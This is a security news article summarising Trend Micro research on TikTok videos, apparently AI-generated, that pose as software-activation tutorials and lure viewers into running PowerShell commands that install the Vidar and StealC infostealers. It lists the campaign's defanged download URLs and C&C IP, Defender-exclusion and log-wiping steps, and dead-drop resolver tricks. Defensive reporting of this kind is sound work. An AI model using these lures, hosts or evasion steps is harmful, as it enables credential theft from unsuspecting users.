Trend Micro reveals a growing threat on TikTok, where AI-generated videos deceive users into running malicious PowerShell commands — exposing them to potent information-stealing malware.
In a recent exposé, Trend Micro uncovered a dangerous social engineering campaign that hijacks TikTok’s viral platform to distribute Vidar and StealC, two sophisticated information-stealing malware families. By leveraging AI-generated content and exploiting user trust, cybercriminals are transforming innocent video tutorials into vectors for malware.
“This attack uses videos (possibly AI-generated) to instruct users to execute PowerShell commands, which are disguised as software activation steps,” the report explains.
The campaign begins with TikTok accounts like @gitallowed, @zane.houghton, and @sysglow.wow sharing faceless tutorial videos that instruct viewers to activate software like Windows, Spotify, or CapCut. These videos, some garnering over half a million views, show step-by-step “activation” instructions that culminate in a PowerShell command like:
“The videos instruct viewers to run a sequence of commands… The instructional voice also appears AI-generated, reinforcing the likelihood that AI tools are being used to produce these videos,” noted Trend Micro.
The command downloads and executes a remote script, initiating a malware dropper chain that is both stealthy and persistent.
Here’s a breakdown of how the attack unfolds:
- Users execute PowerShell commands directly after watching the TikTok video.
- A remote script from hxxps://allaivo[.]me/spotify is downloaded and run.
- Hidden directories are created in APPDATA and LOCALAPPDATA, and added to Windows Defender’s exclusion list.
- A secondary payload is downloaded — typically Vidar or StealC from hxxps://amssh[.]co/file.exe.
- A final persistence script is fetched from hxxps://amssh[.]co/script.ps1, enabling the malware to survive reboots.
- Logs and temp folders are deleted to obscure forensic evidence.
“The script employs retry logic to ensure that the payload is downloaded successfully, and then launches the malware executable as a hidden, elevated process,” Trend Micro warns.
Once active, the malware communicates with its C&C servers using novel evasion techniques:
- Vidar uses platforms like Steam and Telegram as Dead Drop Resolvers (DDR), hiding real server addresses in profile metadata.
- StealC connects directly to IP-based endpoints like 91[.]92[.]46[.]70.
“Vidar, in particular, abuses legitimate services like Steam and Telegram to serve as Dead Drop Resolvers,” the researchers state.
The abuse of TikTok’s algorithmic amplification, combined with AI-generated deception, marks a new era in malware delivery. As Trend Micro emphasizes: “The use of AI-generated content also elevates these kinds of attacks from isolated incidents to a highly scalable operation.”
